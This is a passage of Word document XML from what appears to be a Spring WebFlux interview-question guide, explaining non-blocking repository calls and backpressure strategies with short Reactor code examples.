    <w:p w14:paraId="67D8D033"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B82526"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UserRepository userRepository; // Non-blocking repository method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75D681" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B2F971"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etMapping("/getUser")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E183113"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User&gt; getUser(@RequestParam String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611F9B9D"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This is a non-blocking call (e.g., using R2DBC or reactive MongoDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1BD97"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userRepository.findById(userId);  // This is a non-blocking call!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF2FE62"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5415B5BD"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5FEA0014" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019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n this updated code, userRepository.findById() returns a Mono&lt;User&gt;, and the operation is </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The thread is not blocked while waiting for the database query to finish, and it can be used for other tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F11F91A" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00B13F85" w:rsidRDefault="002019AF"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onclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E1B42" w14:textId="77777777" w:rsidR="002019AF" w:rsidRPr="00CE4B95" w:rsidRDefault="002019AF" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w: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xml:space="preserve">, blocking operations (like traditional JDBC database calls or blocking HTTP requests) can severely limit the scalability of your application. Instead, you should use </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and reactive libraries (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</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MongoDB</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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to fully leverage the non-blocking architecture of WebFlux and avoid blocking threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168A30B"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8B9135C">
          <v:rect id="_x0000_i2287" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3643C12D" w14:textId="15A5BCB5"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01" w:name="_Toc196307981"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Spring WebFlux handle backpressure</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="501"/>
    </w:p>
    <w:p w14:paraId="3A4F7D72" w14:textId="328CE01A" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A6176"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xml:space="preserve"> handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is an integral part of the framework's design. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs when a system or component producing data is faster than the system or component consuming the data, causing the consumer to become overwhelmed and potentially </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>leading to issues like memory exhaustion or dropped data. In reactive programming, handling backpressure efficiently is essential for maintaining system stability, especially when dealing with high-throughput or resource-intensive operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C552F" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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Key Concepts of Backpressure in Spring WebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ACAC97"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ctive Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> define a standard for asynchronous stream processing with </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This specification includes four key interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B65DF65"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Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The producer of data, such as a stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37E48F"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ubscriber</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The consumer of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314804A3"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ubscription</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A connection between the publisher and the subscriber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E6AE04"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Processor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A combination of both publisher and subscriber.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AEB042"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 WebFlux leverages these components to control how data flows between producers and consumers, ensuring that backpressure is properly managed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACC7E5" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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How Spring WebFlux Handles Backpressure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D4F98"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Flow Control</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6344EC" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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Spring WebFlux, backpressure is primarily handled via the Publisher and Subscriber relationship. The Subscriber can signal the Publisher to produce a specific amount of data at a time, preventing the consumer from being overwhelmed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A57EF3E" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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 Subscriber requests data from the Publisher using the request(n) method, where n is the number of items it is willing to consume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8211BD" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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f the subscriber is not ready to handle more items, it can request fewer items or temporarily stop consuming, allowing the system to adapt and prevent overloading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEF4EEE"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ctive Types: Mono and Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B40768" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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Mono</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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are the building blocks of reactive programming in Spring WebFlux, representing single (Mono) or multiple (Flux) asynchronous values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8CFFDE" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is particularly useful for handling a stream of items. It provides mechanisms for controlling how many items are emitted by the publisher at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E40AE62"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or example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026EAB10"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lux&lt;Integer&gt; flux = Flux.range(1, 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA546E6"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onBackpressureBuffer(100, (buffered, dropped) -&gt; System.out.println("Dropped: " + dropped));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619DC756"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lux.subscribe(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF520A7" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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this example, onBackpressureBuffer(100) means that if the consumer can't keep up with the rate of data emission, the publisher will buffer up to 100 items. If the buffer overflows, the dropped callback is invoked, and items are discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F2B4E1"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Backpressure Strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring WebFlux provides several strategies to handle backpressure, which allows developers to control how the system reacts when the consumer can’t keep up with the publisher:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141212A7" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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onBackpressureBuffer()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Buffers the incoming data until the consumer is ready. It ensures that the items aren’t lost, but may cause memory consumption to increase if the buffer grows too large.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14624E43" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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onBackpressureDrop()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Drops the excess data when the consumer is overwhelmed, making it useful for scenarios where losing data is acceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A611FA8" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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onBackpressureLatest()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only allows the most recent data to be processed and drops any intermediate items. It ensures that only the latest data is processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B08362B"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xample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2512C3B3"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lux&lt;Integer&gt; flux = Flux.range(1, 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEA66B8"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onBackpressureDrop();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A737FA1"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ctive Operators</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF414B6" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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 WebFlux also offers a set of operators that can be used to control backpressure behavior in different ways. Some of these operators help with throttling or merging the data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCB600F"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xample: Using delayElements to throttle data production:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E310667"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lux&lt;Integer&gt; flux = Flux.range(1, 1000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CF6713"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delayElements(Duration.ofMillis(100));  // Delay each item by 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B20C96"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lux.subscribe(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D999150"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ubscriber Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57687417" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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consumer (Subscriber) can use the request(n) method to ask for more data. If the subscriber knows it cannot process more than a certain number of items at a time, it can request a specific number of items. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3A81E0"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lux&lt;Integer&gt; flux = Flux.range(1, 1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28956151"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lux.subscribe(new Subscriber&lt;Integer&gt;() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C32C55"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 xml:space="preserve">    private Subscription subscription;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B886C6E"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2BB4909A"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491C3937"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void onSubscribe(Subscription subscription) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACBC194"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his.subscription = subscription;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CE395C"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ubscription.request(10);  // Requesting only 10 items initially</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B5C28"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0E8B4D4A" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A6176" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1120D2CC"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33439774"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void onNext(Integer integer) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43161196"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ystem.out.println(integer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AD762B"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599B1ED2" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A6176" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EFA37E8"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F7C0C"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void onError(Throwable throwable) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86BE1D" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A6176" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02382BA4"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEEE288"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void onComplete() {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A755ED7"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13C42A03"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this case, the subscriber requests only 10 items at a time, and the publisher will only send data in batches of 10 items, respecting the backpressure mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678C68A3" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10973439" w14:textId="77777777" w:rsidR="004A6176" w:rsidRPr="00B13F85" w:rsidRDefault="004A617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n Spring WebFlux, backpressure is handled efficiently by using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous, non-blocking data processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The framework provides several backpressure strategies such as onBackpressureBuffer(), onBackpressureDrop(), and onBackpressureLatest() to control how data should be handled when the consumer can't keep up with the producer. These mechanisms help ensure that the system remains responsive and doesn't overwhelm resources, providing a reliable approach to managing high-throughput applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A0C67C"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F28AE3B">
          <v:rect id="_x0000_i2288" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EB31F3" w14:textId="3C3270B2"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02" w:name="_Toc196307982"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is backpressure and why is it important</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="502"/>
    </w:p>
    <w:p w14:paraId="1CC3B4CE" w14:textId="4DDDD7EF" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a mechanism used in reactive programming to handle scenarios where the consumer (the component processing data) cannot keep up with the producer (the component generating data). It essentially signals the producer to slow down or to stop producing more data temporarily until the consumer is ready to handle more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC1303" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Backpressure is crucial because, in systems that handle high volumes of data, it prevents the consumer from being overwhelmed, ensuring that the system remains stable, avoids memory overflow, and continues processing data in a controlled manner. Without backpressure, data can accumulate faster than it can be processed, leading to system crashes, dropped data, or increased latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53721B34" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Why is Backpressure Important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8A6DCF" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Prevent System Overload</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
